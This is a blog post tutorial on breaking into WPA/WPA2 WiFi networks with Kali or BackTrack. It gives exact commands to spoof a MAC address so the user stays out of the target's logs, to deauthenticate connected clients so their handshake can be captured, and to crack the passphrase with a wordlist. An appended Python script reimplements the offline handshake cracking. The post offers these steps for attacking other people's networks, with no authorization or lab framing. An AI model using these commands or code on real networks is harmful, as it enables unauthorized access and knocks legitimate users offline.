Wednesday, July 29, 2015

Hacking WiFi using BackTrack or Kali Linux

WiFi networks that do not expose a WPS PIN can still be attacked with BackTrack or Kali Linux by capturing the WPA/WPA2 four-way handshake and running an offline dictionary attack against it. It is more involved than a WPS attack, but not impossible.

Some requirements


1. We need to boot or install Kali Linux or BackTrack.

2. The wireless network card is important: it must support monitor mode and packet injection.

Some important terms used below

1. MAC Address (Media Access Control address): the hardware address of a network interface.
2. WAP (Wireless Access Point).
3. PSK (Pre-Shared Key): the WiFi password.
4. WPA/WPA2 (WiFi Protected Access / WiFi Protected Access 2).
5. BSSID (Basic Service Set Identifier): the MAC address of the access point.

There are a few steps to be followed.

First step (1):
  •  In BackTrack open the terminal and give the command: ifconfig
  •  You will see a list of all the network adapters in your system, such as wlan0, wlan1 etc.
  •  Turn off your wireless card using the command: ifconfig wlan0 down (change wlan0 to whatever name the previous command showed.)
  •  Give the command: macchanger -m 00:11:22:33:44:55 wlan0 (this spoofs the card's MAC address so your real one does not appear in the target's logs.)
  •  Turn the device back on by giving the command: ifconfig wlan0 up

Second step (2)
      The second step is all about creating a virtual monitoring interface.

  •  Give the command: airmon-ng start wlan0
  •  It creates a new monitor-mode interface called mon0. Use that name, not wlan0, in all the commands that follow.

Third step (3)
       Monitor the wireless traffic to pick the target.

  •  Give the command: airodump-ng mon0. It will list all active APs with their BSSID, channel and other details. Below that list you will see the stations (clients) connected to each of the APs.
  •  Note down the BSSID and the channel (the CH column in the output) of the AP you want to hit.
  •  Hit Ctrl+C to end the monitoring.

Fourth step (4)
       Lock onto the target AP.
       This limits the capture to traffic from just the access point you want and writes the collected frames into a file, which is what you will crack later.

       What we are hoping to capture is the four-way handshake that the station and the AP use to authenticate; the MIC values in that handshake can then be used to test password guesses offline.
  •  Give the command: airodump-ng --bssid <BSSID of AP> -c <channel> -w dumpfilename mon0
       The parts in angle brackets need to be changed to the values you noted in the previous step. dumpfilename can be replaced with anything; airodump-ng appends a number and the extension, so the capture ends up in a file such as dumpfilename-01.cap.

  •  This will keep monitoring the access point and also show you the stations connected to it. Write down the MAC address of one of the stations so that you can force it to disconnect and reconnect.
Fifth step (5)
       Capturing the authentication packets: this only works if your network card supports packet injection; otherwise you will have to wait until a user disconnects and reconnects on their own.
  •  Open a new terminal (leave airodump-ng running) and give the command:
     aireplay-ng -0 30 -a <BSSID of AP> -c <MAC of connected station> mon0
     -0 is the deauthentication attack. This sends 30 deauthentication frames, spoofed as coming from the AP, to the chosen station, causing it to reconnect to the access point and perform the handshake again. (-a takes the AP's BSSID and -c the station's MAC; if you leave out -c the frames are broadcast to every station on that AP.)
  •  If it shows an error or does not seem to work, it is probably an injection problem with the network card and you will need to wait until the user reconnects by himself.
  •  Once the reconnection happens you can see it in the airodump-ng terminal that is capturing the packets: "WPA handshake: <BSSID>" appears in the top right corner.
     Hit Ctrl+C and exit it. Time to crack the password.
Sixth step (6): Password cracking
  •  You need a wordlist file, which can be downloaded from the internet. Just search for "wordlist" or "password list"; you can get files with millions of words, some as big as 1 GB to 10 GB. The more words in it the better, but note that only entries of 8 to 63 characters are valid WPA passphrases, so anything else is skipped.
  •  Get and extract the wordlist file to your home folder.
  •  Run the command:
     aircrack-ng -w wordlist.lst -b <BSSID of AP> dumpfilename*.cap
  •  Replace the parts in angle brackets with the right details.
Wait some time and, if the password is in the wordlist, you will see it on your screen. If it is not, aircrack-ng reports failure and you need a bigger or better-targeted wordlist. ENJOY GUYS!!!!!
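To show what aircrack-ng is actually doing in the sixth step, and why the captured handshake is enough to test guesses offline, here is an added example that is not part of the original post. It derives the PMK from a candidate passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 rounds), expands it to the PTK with the two MACs and two nonces from the handshake, and checks the key confirmation key against the MIC of the captured EAPOL message 2. The SSID, passphrase, MAC addresses, nonces, the minimal EAPOL-Key frame and the wordlist are all constructed for the example; a real capture would be parsed out of the dumpfilename-01.cap file instead. It also handles the WPA (TKIP, HMAC-MD5) versus WPA2 (CCMP, HMAC-SHA1) MIC difference, which the tool chooses from the key descriptor version in the frame.

```python
import hashlib
import hmac
import struct

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame:
# 4-byte EAPOL header + descriptor type(1) + key info(2) + key length(2)
# + replay counter(8) + nonce(32) + IV(16) + RSC(8) + ID(8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are why every wordlist guess costs roughly 8192 SHA-1 calls."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """The first 16 bytes of the PTK are the KCK, the key that MACs the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC over the whole EAPOL frame with the MIC field zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP)
    uses HMAC-SHA1 truncated to 16 bytes."""
    key_info = struct.unpack(">H", frame[5:7])[0]
    version = key_info & 0x7
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """What `aircrack-ng -w wordlist` does with a captured handshake: derive the
    KCK for each candidate and compare the recomputed MIC with the captured one."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:   # not a valid WPA passphrase, skip it
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes = bytes(16), version: int = 2) -> bytes:
    """Constructed EAPOL-Key message 2 (station -> AP), RSN descriptor, no key data."""
    key_info = 0x0108 | version            # MIC bit + Pairwise bit + descriptor version
    body = struct.pack(">BHH8s32s16s8s8s16sH",
                       2, key_info, 16, (1).to_bytes(8, "big"), snonce,
                       bytes(16), bytes(8), bytes(8), mic, 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body   # EAPOL v2, type 3 = Key


# Constructed handshake parameters (not from any real capture).
SSID = "ExampleNet"
PASSPHRASE = "correct horse"                # the secret the wordlist has to find
AP_MAC = bytes.fromhex("020000000100")      # locally administered, made up
STA_MAC = bytes.fromhex("020000000200")
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()
WORDLIST = ["password", "short", "letmein123", "correct horse", "hunter2hunter2"]


def constructed_capture(version: int = 2) -> bytes:
    """Stand-in for the message 2 that airodump-ng would write to the .cap file:
    the frame carries a valid MIC computed from the real passphrase."""
    kck = kck_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)
    unsigned = build_msg2(SNONCE, version=version)
    mic = eapol_mic(kck, unsigned)
    return unsigned[:MIC_OFFSET] + mic + unsigned[MIC_OFFSET + 16:]


if __name__ == "__main__":
    print(crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                    constructed_capture(), WORDLIST))
```

Two things the page's step 6 leaves implicit fall out of this: the attacker never needs the AP again once message 2 (or any MIC-bearing handshake message with both nonces known) is on disk, and the cost per guess is fixed by the 4096 PBKDF2 rounds, so a passphrase that is not in the wordlist is simply never found.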
       
